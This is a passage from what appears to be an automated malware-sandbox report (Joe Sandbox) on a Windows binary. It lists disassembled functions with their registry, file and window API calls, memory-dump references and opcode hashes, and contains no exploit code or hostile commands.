                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4025006896-0
                                                                                                    • Opcode ID: 25653522eac89486967f0396ffd81156270adfff78a33eb3207f8559d2e795ea
                                                                                                    • Instruction ID: 210b8a98c92cc6c6dd877ced6ee0dd2ad7699c55e9f22dfc8dc813c4667524cb
                                                                                                    • Opcode Fuzzy Hash: 25653522eac89486967f0396ffd81156270adfff78a33eb3207f8559d2e795ea
                                                                                                    • Instruction Fuzzy Hash: E00169766202856FCB10FBACDCC0E9B77BDEB59341F258218B964DB2C5DA7199C087A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D0320 Relevance: 4.6, APIs: 3, Instructions: 132registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,032D04BA), ref: 032D038C
                                                                                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,032D04BA), ref: 032D03F7
                                                                                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 032D045C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: 9a2c1d94019d02742e49da400e7bdb3467dddb118a1cf7b1459d1007e0cd3e13
                                                                                                    • Instruction ID: 58c7bf2aeb0b45ffa9107a1c769b47defed26bc689488dc485ec68c02f19e90b
                                                                                                    • Opcode Fuzzy Hash: 9a2c1d94019d02742e49da400e7bdb3467dddb118a1cf7b1459d1007e0cd3e13
                                                                                                    • Instruction Fuzzy Hash: B441B038A20308BFDB11EBA4C981FDEB7F9EF44344F148069E854A7662C7B49F859740
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032C9CA0 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,032C9DE8,?,?,032C5B68,00000001), ref: 032C9CFC
                                                                                                    • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,032C9DE8,?,?,032C5B68,00000001), ref: 032C9D2A
                                                                                                      • Part of subcall function 032B8CE0: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,032C5B68,032C9D6A,00000000,032C9DE8,?,?,032C5B68), ref: 032B8D2E
                                                                                                      • Part of subcall function 032B8F1C: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,032C5B68,032C9D85,00000000,032C9DE8,?,?,032C5B68,00000001), ref: 032B8F3B
                                                                                                    • GetLastError.KERNEL32(00000000,032C9DE8,?,?,032C5B68,00000001), ref: 032C9D8F
                                                                                                      • Part of subcall function 032BB878: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,032BD5E5,00000000,032BD63F), ref: 032BB897
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                    • String ID:
                                                                                                    • API String ID: 503785936-0
                                                                                                    • Opcode ID: a5ba04a63b56f6527a2775bc69fca4f295824bedbb012ea17d9ab160e3d61dc6
                                                                                                    • Instruction ID: 9aa324c69c928bde30d562e2593eb24a45b9d68b00adce39066ada96bead7814
                                                                                                    • Opcode Fuzzy Hash: a5ba04a63b56f6527a2775bc69fca4f295824bedbb012ea17d9ab160e3d61dc6
                                                                                                    • Instruction Fuzzy Hash: BD318478A207499FDB00FFA5C880BDEB7F5AF09740F508169E504BB381D7B55984CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0330C850 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,03424BB0), ref: 0330C894
                                                                                                    • RegSetValueExA.ADVAPI32(00000884,00000000,00000000,00000001,00000000,0000001C,00000000,0330C8FF), ref: 0330C8CC
                                                                                                    • RegCloseKey.ADVAPI32(00000884,00000884,00000000,00000000,00000001,00000000,0000001C,00000000,0330C8FF), ref: 0330C8D7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 779948276-0
                                                                                                    • Opcode ID: 7cc262b330ad7784a812d87603e05bc9a749505bc193c2fb73195cdbcac080ea
                                                                                                    • Instruction ID: f1a17031aff7bd88e9f328a9cdd9dac1ac10fd78604ed477fd5055c15da43677
                                                                                                    • Opcode Fuzzy Hash: 7cc262b330ad7784a812d87603e05bc9a749505bc193c2fb73195cdbcac080ea
                                                                                                    • Instruction Fuzzy Hash: EA111275610308AFDB10FBA6DDD1A9D7BFCEB04740F504061F904EF352D7709A818A54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032BF6D0 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClearVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 1473721057-0
                                                                                                    • Opcode ID: b28c646f82ce2cd252d90ea0baface2e61be537eb1fdf2171e89f56c4c3785db
                                                                                                    • Instruction ID: 20ec674f9ad1c45274e0d5cd7f1a3e2518cd91444840188a60dc0c1ca64c90d6
                                                                                                    • Opcode Fuzzy Hash: b28c646f82ce2cd252d90ea0baface2e61be537eb1fdf2171e89f56c4c3785db
                                                                                                    • Instruction Fuzzy Hash: 68F08C69A3420067DA11FB289E845EA63BC9F017C0F6844E5E4469B216CBB48CCAA322
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B5058 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SysFreeString.OLEAUT32(0330C964), ref: 032B4F76
                                                                                                    • SysAllocStringLen.OLEAUT32(?,?), ref: 032B5063
                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 032B5075
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$Free$Alloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 986138563-0
                                                                                                    • Opcode ID: df0ebbd49c3a427229fcfe081cf9a0000e2a8653e023cf59d4f9583f6407e03e
                                                                                                    • Instruction ID: 9ec803c6becae361ef0c2666f31fb5f7af9effbe700e996e7b093893ae379217
                                                                                                    • Opcode Fuzzy Hash: df0ebbd49c3a427229fcfe081cf9a0000e2a8653e023cf59d4f9583f6407e03e
                                                                                                    • Instruction Fuzzy Hash: 32E0ECBC1253025DEE14EA658850FB67379AF81780F588458A440CE265DB7894E19624
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032CF2A8 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 032CF5A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString
                                                                                                    • String ID: H
                                                                                                    • API String ID: 3341692771-2852464175
                                                                                                    • Opcode ID: f56850bb360de61e271a80cf8fdeb856bdcd6d95897cd5bc5b927e26cb7bafd2
                                                                                                    • Instruction ID: d77a4a4f624422278a2d868301557ecdb3a95d08f92d441cd3ceb1eab9e2f06b
                                                                                                    • Opcode Fuzzy Hash: f56850bb360de61e271a80cf8fdeb856bdcd6d95897cd5bc5b927e26cb7bafd2
                                                                                                    • Instruction Fuzzy Hash: 3BB1F374A21649EFDB10CF98D580A9DBBF6FF89310F248269E905AB361D730AC85CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D04D4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,032D053C), ref: 032D050A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID: MS Shell Dlg 2
                                                                                                    • API String ID: 3660427363-3198668166
                                                                                                    • Opcode ID: 87eb63883dcf174087ea524abea919492a223dcead9632fe77c88ac690ec503f
                                                                                                    • Instruction ID: 9748c0c1bd11c43c6c990f6adbddc12fdda31124ce6ae7c05b2f27306fc8f9ab
                                                                                                    • Opcode Fuzzy Hash: 87eb63883dcf174087ea524abea919492a223dcead9632fe77c88ac690ec503f
                                                                                                    • Instruction Fuzzy Hash: 66F0896631D3446FD704E66D9D40BDB7B9C9B85750F05807AF548CB551DA60CC088361
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D04D8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,032D053C), ref: 032D050A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID: MS Shell Dlg 2
                                                                                                    • API String ID: 3660427363-3198668166
                                                                                                    • Opcode ID: ca08024a9cf823153a91d6cd59c39d2f6741ddebabc56f770993d5350fd29ef3
                                                                                                    • Instruction ID: 22e8b49735d28d2241a30597f674e35d7e7e27b1f380ba3a7449a78f0396cec7
                                                                                                    • Opcode Fuzzy Hash: ca08024a9cf823153a91d6cd59c39d2f6741ddebabc56f770993d5350fd29ef3
                                                                                                    • Instruction Fuzzy Hash: 27F0306A3192546BD704EAAD9D40FAB6BDCDB85790F05803AB948CB251DA61DC098361
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032BFACC Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VariantCopy.OLEAUT32(00000000,00000000), ref: 032BFAED
                                                                                                      • Part of subcall function 032BF6D0: VariantClear.OLEAUT32(?), ref: 032BF6DF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearCopy
                                                                                                    • String ID:
                                                                                                    • API String ID: 274517740-0
                                                                                                    • Opcode ID: 2051a498f8db3b64656e5aacfe0d2abfcf86cf8fbb86eb4580670ac17edc5faf
                                                                                                    • Instruction ID: b6d05454b9b4faeefde9835882ee4f89913e03fc9cb74c77b7419572c0faf8b7
                                                                                                    • Opcode Fuzzy Hash: 2051a498f8db3b64656e5aacfe0d2abfcf86cf8fbb86eb4580670ac17edc5faf
                                                                                                    • Instruction Fuzzy Hash: 17115134730311A6C724EF298ED49D773B99F897D07198465E84A8F655DAB0CCC0C761
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D028C Relevance: 3.0, APIs: 2, Instructions: 18registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegFlushKey.ADVAPI32(00000000,?,032D02F8,?,?,00000000,032D04A4,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 032D029D
                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,032D02F8,?,?,00000000,032D04A4,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 032D02A6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseFlush
                                                                                                    • String ID:
                                                                                                    • API String ID: 320916635-0
                                                                                                    • Opcode ID: b932250ff9fdfab35df00aa8e44ef11b3c8548d3fa1cf175fc9bedafde95146a
                                                                                                    • Instruction ID: b0801d4f67ad59ad4468e7bdf3eaa3c98c1ae8c3049f3eee1d185067fe155e0e
                                                                                                    • Opcode Fuzzy Hash: b932250ff9fdfab35df00aa8e44ef11b3c8548d3fa1cf175fc9bedafde95146a
                                                                                                    • Instruction Fuzzy Hash: E7D017A5721301CBDF90EF7AC8C4A52BBECAB04240B48C5A19808CF10ADA74D4808B20
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032BF768 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 1927566239-0
                                                                                                    • Opcode ID: 7e45e8b977dffc2c839bc2d88663c57e49a2dff7af0c840ee5e24d2d5f2d3233
                                                                                                    • Instruction ID: 347659a640688cf885f4a9417760490b95a6969c52592debba7958c8436e13fe
                                                                                                    • Opcode Fuzzy Hash: 7e45e8b977dffc2c839bc2d88663c57e49a2dff7af0c840ee5e24d2d5f2d3233
                                                                                                    • Instruction Fuzzy Hash: 36316F75920209BFDB10DEA8DE84AEA77FCEB08384F4845A2F905D7650D770D9E1C751
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D031E Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,032D04BA), ref: 032D038C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: f988c3dd070f72260b3ea75b68339391dd3880f224f8d58455fb509762e13815
                                                                                                    • Instruction ID: 0f77b06a0ff80a17f22d1805e27c16592b21e2205d7e2da40d3c817ffdc9aee4
                                                                                                    • Opcode Fuzzy Hash: f988c3dd070f72260b3ea75b68339391dd3880f224f8d58455fb509762e13815
                                                                                                    • Instruction Fuzzy Hash: C521D534B10308AFDB11EBA5C991BDEB3F9EF44340F158075E804E7662D7B49F849650
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D05C6 Relevance: 1.5, APIs: 1, Instructions: 48registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 032D05F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3660427363-0
                                                                                                    • Opcode ID: 810d9864720d6a7d50ead4e415af3a5bfb8683f92c82549e4e0d4fd586360dc0
                                                                                                    • Instruction ID: 292cb18fad4d3f279c938fff1254c7edebdc71877e62fe7bc8f22126af36a887
                                                                                                    • Opcode Fuzzy Hash: 810d9864720d6a7d50ead4e415af3a5bfb8683f92c82549e4e0d4fd586360dc0
                                                                                                    • Instruction Fuzzy Hash: 13017C76A10208AFDB00EEA9DC80ADEB7BCEB49610F04C166BD14DB241DA719E4087A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D05C8 Relevance: 1.5, APIs: 1, Instructions: 47registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 032D05F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3660427363-0
                                                                                                    • Opcode ID: c2900f50ecfb68e6214f7d60296d44feadeb9eb4a3c6b93d850369c622db7cf7
                                                                                                    • Instruction ID: 75c1514399fa3ff10f4005bd36a4eb688a3fe6e9890d98a15da0f4c5c84910aa
                                                                                                    • Opcode Fuzzy Hash: c2900f50ecfb68e6214f7d60296d44feadeb9eb4a3c6b93d850369c622db7cf7
                                                                                                    • Instruction Fuzzy Hash: 32018F76A10208AFDB00EEA9DC80EDEB7BCEF49710F04C166FD14DB241DA719E4087A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B37C4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CompareStringA.KERNEL32(00000800,00000001,00000000,00000000,00000000,00000000,00000000,032B384B), ref: 032B382A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CompareString
                                                                                                    • String ID:
                                                                                                    • API String ID: 1825529933-0
                                                                                                    • Opcode ID: bf0c3e41c8258e1040ecb6f4588be7dff2aa38a5aa895a3fad192489fd0d13ab
                                                                                                    • Instruction ID: b385912d999c5f625c219f9f45cc87425d2448a1e7b8743e5b95bc86130b7b82
                                                                                                    • Opcode Fuzzy Hash: bf0c3e41c8258e1040ecb6f4588be7dff2aa38a5aa895a3fad192489fd0d13ab
                                                                                                    • Instruction Fuzzy Hash: C001F278624308AFCB00FA699D929DEB6BCDB08740F5204B4B404E7652DBB05F808654
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B738A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 032B73CB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 716092398-0
                                                                                                    • Opcode ID: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
                                                                                                    • Instruction ID: 38d29cf9e6146eed75b88516e3a46a6d5ba53f5d43abe03f604237a1b77223a2
                                                                                                    • Opcode Fuzzy Hash: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
                                                                                                    • Instruction Fuzzy Hash: 81F07AB6700218BF9B80DE9DDC80EEB77ECEB8C2A4B054165BA0CD7200D670ED508BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B738C Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 032B73CB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
